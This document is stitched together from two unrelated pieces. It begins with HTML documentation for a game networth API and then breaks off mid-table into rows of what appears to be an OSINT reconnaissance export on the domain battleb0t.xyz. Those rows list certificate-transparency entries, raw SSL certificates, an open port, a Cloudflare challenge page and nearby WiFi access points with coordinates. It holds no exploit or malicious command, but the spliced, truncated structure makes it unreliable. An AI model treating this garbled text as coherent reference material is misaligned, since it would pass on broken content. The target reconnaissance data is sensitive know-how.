<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01039402468.github.io | 185.199.111.153 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 17 | 0 | 2 | 0 | None | panel.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2086 | 104.21.6.166 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | StartMotor (Net ID: 00:02:CF:A1:A1:06) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BudgetScottsdale (Net ID: 00:09:5B:29:02:37) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a9:fd:fd:93:70:29:b0:48:11:c8:ce:bf:67:f2:09:f0:18:36:
72:e2:d5:45:1a:22:98:73:7b:fc:63:f5:37:b4:8e:20:c8:45:
e4:ce:e2:9e:72:73:e8:ad:47:bf:c0:35:30:a0:a9:68:42:7b:
af:a0:57:45:fd:5a:91:a4:2e:d5:a2:69:b2:ca:b8:65:ec:5c:
97:2b:5a:c2:47:61:9f:c4:81:87:89:15:e0:4d:14:10:00:57:
de:30:17:e4:75:38:ea:ab:0b:a9:2e:0e:a3:de:bf:1e:49:35:
76:16:95:0e:f2:76:59:a6:60:31:e4:31:da:5e:f7:3d:1a:b6:
45:fb:43:8b:75:fa:55:4a:bf:3c:53:c5:63:68:3b:09:79:60:
3e:59:90:9c:6f:29:ba:5e:2e:69:99:fe:bf:eb:b8:a8:a2:e5:
6a:e1:ab:7d:7b:0c:fc:a2:d8:0c:8f:d2:5f:a3:53:b9:f8:44:
96:05:f5:bc:85:79:5a:77:18:35:7d:ad:c6:2f:17:ce:cc:e8:
15:70:ec:81:d3:7e:77:0e:2a:9b:e5:1b:d9:8c:57:bd:a3:bc:
0a:e0:67:62:79:dd:4b:90:cc:e8:41:75:b0:89:34:3b:68:0e:
36:40:32:41:3e:6c:17:bc:5d:a4:cc:91:d3:38:4a:ce:c8:1b:
ab:60:7c:08
| battleb0t.xyz |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5oVgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'QLdIKmVk90yEleUYFE8hq2th+l+jM4Uner6m/PqgQtgOm/j9Wu0B6Nwve/VIS31m9W0lb1V8I9RlPI3LD6ZpGikA+cl1xSe9juPQwbg/Khf2e9vfPpLKN0X7UvbusnivZuKA6TGjro8M7MljUWp3taWc0NTFEoxbvZYXtf23gnOsGXD0P3fio4y3xX1t0tyqoIYWkX6yVqHvCXS1I5Mc00CNY00FBcI/7efFMNVH6yXhbtO4DyojjSzFMA05WgLv1NMq/SwjeKgTF2UQjV1ScyP6xlwF4X/SOwW0/jc9ATHtwcZox/DXcQhTbYvzRGwtclm7F8sB4NPhEbop1gXy97S6V5xE84j90At9GihMuWgC3j9pOQviCNo3sewEE1wcCPBex3qLyb9lbO0GI3TZ/lO3ce3eYjSncgsTFzLP72SeeH7Cmkp5RZNQKUNY6KsNqv0SoqAADgpekKlGL1tqVOG6O7u3V3DisK9MR45AkotpTXq8Qr9XZQjfqaCO5Yfbn8lV1zfjI7l05/9wUrB6DYoT7pc7b3AgDm+BZdc44QE9FZKV/xPKQptYvP3Z+ZLT',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \005\014\006\035\026\027\003\037\003\037\022\032\0 (Net ID: 00:06:25:0B:A9:FE) | 39.0469, -77.4903 |
| 2023-05-12 02:47:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c7:83:d8:18:48:a0:26:ac:0e:41:bf:5e:7d:c6:c3:07
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Jan 17 09:16:26 2023 GMT
Not After : Apr 17 09:16:25 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c9:69:39:93:28:ab:3e:d3:a5:d5:a5:72:cd:be:
43:92:fc:b1:41:1e:65:40:ba:b6:a5:98:c9:0a:c1:
0a:16:38:c6:f0:6f:13:8a:f1:50:6e:63:c7:c9:4d:
3d:84:6a:35:2b:f1:16:92:ef:9c:26:1f:97:22:55:
e7:7e:fd:a5:40:94:99:7b:2a:b2:9f:89:9a:e1:30:
e0:1b:38:af:f1:7d:fe:1d:f3:e2:fc:ad:49:66:7b:
1e:5b:c2:73:59:c0:35:17:1a:cb:8b:a8:f6:c4:6d:
b8:77:b7:bc:64:fb:68:2f:62:4e:80:30:15:70:8f:
2d:50:8e:a9:f6:b0:b5:02:42:f1:48:e2:81:92:3e:
44:a6:5b:69:a6:54:e5:ee:c1:74:2a:c1:ec:11:dc:
59:f2:1e:65:9f:eb:94:d2:24:cd:99:20:ee:91:26:
11:c9:44:8f:62:f0:c5:34:f8:77:d4:9d:29:a7:42:
e2:30:2c:71:73:82:02:34:4e:a9:30:9a:b9:ab:95:
0a:72:71:e0:79:05:25:70:cd:6a:cc:a1:b4:51:7d:
04:6f:2b:68:12:e1:a4:1d:84:68:0d:5c:76:58:33:
de:fd:16:f6:1b:5f:7b:dc:4d:c0:66:3d:ae:d0:46:
